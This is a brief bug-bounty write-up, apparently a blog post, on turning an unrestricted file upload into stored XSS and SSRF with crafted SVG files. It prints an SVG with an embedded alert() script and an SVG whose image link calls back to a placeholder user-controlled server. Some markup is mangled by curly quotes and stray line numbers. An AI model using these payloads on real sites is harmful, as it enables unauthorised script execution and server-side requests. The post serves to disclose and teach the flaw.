XSS Attacks via SVG images

2 min readAug 1, 2021


Hola Guys!!!

I was doing hunting on website it is private site let’s take as redacted.com, after some hours of hunting i got some low vulnerability bugs i one of them i got unrestricted file upload by changing the content type header and then i thought of making it more critical vulnerability….!


I have crafted a malicious SVG file, since the application has unrestricted file upload bug and do not filter the content, the code below can be saved with the .svg extension file and i have used below payload to trigger

<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “

<svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">
<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/>
<script type=”text/javascript”>
alert(‘Vulnerable to XSS attacks’);

The vulnerability can be exploited by uploading this image in image upload section by using unrestricted file upload bug i can upload svg files and any malicious files there i have used svg and used above code in the svg and then if you preview the image the you can see the xss is triggered..!!!!

And i was also able to get svg to ssrf after using below code i have got http response in the burp collaborator :)

<?xml version=”1.0" encoding=”UTF-8" standalone=”no”?> 2<!DOCTYPE testingxxe [ <!ENTITY xml “eXtensible Markup Language”> ]> 3<svg xmlns:svg=”http://www.w3.org/2000/svg" xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink" width=”200" height=”200"> 4<image height=”30" width=”30" xlink:href=”http://<usercontrolledserever>/” /> 5<text x=”0" y=”20" font-size=”20">&xml;</text> 6</svg>


This is how we can perform stored xss, ssrf attacks using svg files.

Don’t forget to hit the “follow” button to see my future blogs on security.

I will see you in the next post.

Thanks for reading!!

Want to Connect?
Follow me on twitter: https://twitter.com/nave1n0x




Web2 & Web3 Security Researcher, Blockchain Enthusiast, Pentester, Solidity Smart Contract Auditor, My Twitter https://twitter.com/nave1n0x